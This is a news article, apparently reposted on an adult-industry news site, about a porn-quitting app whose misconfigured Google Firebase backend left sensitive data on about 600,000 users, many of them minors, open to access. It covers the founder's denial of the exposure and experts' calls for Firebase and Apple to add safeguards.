There’s something quietly disturbing about discovering that a tool meant to help people wrestle with their most private habits accidentally left the blinds wide open. An app that claims to help users stop consuming pornography ended up exposing intensely sensitive personal data — the kind of stuff most people wouldn’t even admit to a close friend. Ages. Masturbation frequency. Emotional triggers. How porn makes them feel afterward. And tucked inside that data were a lot of minors, which makes your stomach drop a little when you really sit with it.
One user profile, for instance, listed their age as “14.” Their “frequency” showed porn use “several times a week,” sometimes up to three times a day. Their “triggers” were logged as “boredom” and “Sexual Urges.” The app had even assigned a “dependence score” and listed their “symptoms” as “Feeling unmotivated, lack of ambition to pursue goals, difficulty concentrating, poor memory or ‘brain fog.’” It reads less like analytics and more like a vulnerable diary entry — something that was supposed to stay locked away.
The app isn’t being named because the developer still hasn’t fixed the issue. The problem was uncovered by an independent security researcher who asked to remain anonymous. He first flagged it to the app’s creator back in September. The creator said he’d fix it quickly. That didn’t happen. The flaw comes from a misconfiguration in how the app uses Google Firebase, a popular mobile app development platform. By default, Firebase can make it surprisingly easy for anyone to become an “authenticated” user and access backend storage — the digital attic where all the private boxes tend to live if you’re not careful.
Overall, the researcher said he could access information belonging to more than 600,000 users of the porn-quitting app, with roughly 100,000 identifying as minors. That number lands heavy. It’s not abstract. It’s classrooms. It’s school buses. It’s kids who probably assumed they were talking into a void, not a wide-open window.
The app also invites users to write confessions about their habits. One of them read: “I just can’t do this man I honestly don’t know what to do know more, such a loser, I need serious help.” You can almost hear the frustration in that sentence — the messy spelling, the emotional spill. That’s not data. That’s a human having a rough night.
When reached by phone, the creator of the app said he had spoken with the researcher but claimed the app never exposed any user data due to a misconfigured Google Firebase. He suggested the researcher may have fabricated the data that was reviewed.
“There is no sensitive information exposed, that’s just not true,” the founder said. “These users are not in my database, so, like, I just don’t give this guy attention. I just think it’s a bit of a joke.”
When asked why he previously thanked the researcher for responsibly disclosing the misconfiguration and said he would rush to fix it, he wished me a good day and hung up. One of those conversations that ends abruptly, leaving a strange quiet buzzing in the room.
After the call, an account was created on the app. The researcher was then able to see that new account appear inside the misconfigured Google Firebase environment — confirmation that user information was still exposed and accessible. Sometimes reality has a way of answering arguments faster than any debate ever could.
This type of Google Firebase misconfiguration isn’t new. Security researchers have been talking about it for years, and it continues to surface today. It’s one of those problems that feels boring until it suddenly isn’t — until someone’s real life data is sitting out in the open.
Dan Guido, CEO of cybersecurity research and consulting firm Trail of Bits, said in an email that this Firebase issue is “a well known weakness” and easy to find. He recently noted on X that Trail of Bits was able to build a tool using Claude to scan for this vulnerability in just 30 minutes.
“If anyone is best positioned to implement guardrails at scale, it is Google/Firebase themselves. They can detect ‘open rules’ in a user’s account and warn loudly, block production configs, or require explicit acknowledgement,” he said. “Amazon has done this successfully for S3.” S3 is a cloud storage product from AWS that previously struggled with similar data exposure issues due to misconfigurations.
The researcher who uncovered the app’s vulnerability added that this insecure setup is often the default in Google Firebase. He also pointed a finger at Apple, arguing that apps should be reviewed for backend security issues before being allowed into the App Store.
“Apple will literally decline an app from the App Store if a button is two pixels too wide against their design guidelines, but they don’t, and they don’t check anything to do with the back end database security you can find online,” he said. It’s one of those comments that lands with an uncomfortable kind of truth — polished surfaces, shaky foundations.
Apple and Google did not respond to requests for comment.
And that’s the part that lingers. People trusted this app with their most awkward truths, their late-night regrets, their quiet attempts at self-control. Some of them were kids. They weren’t posting for an audience. They were whispering into what they thought was a locked room. Turns out the door was never really closed.
Read More »
The War on Porn Regular Updates about the Assault on The Adult Industry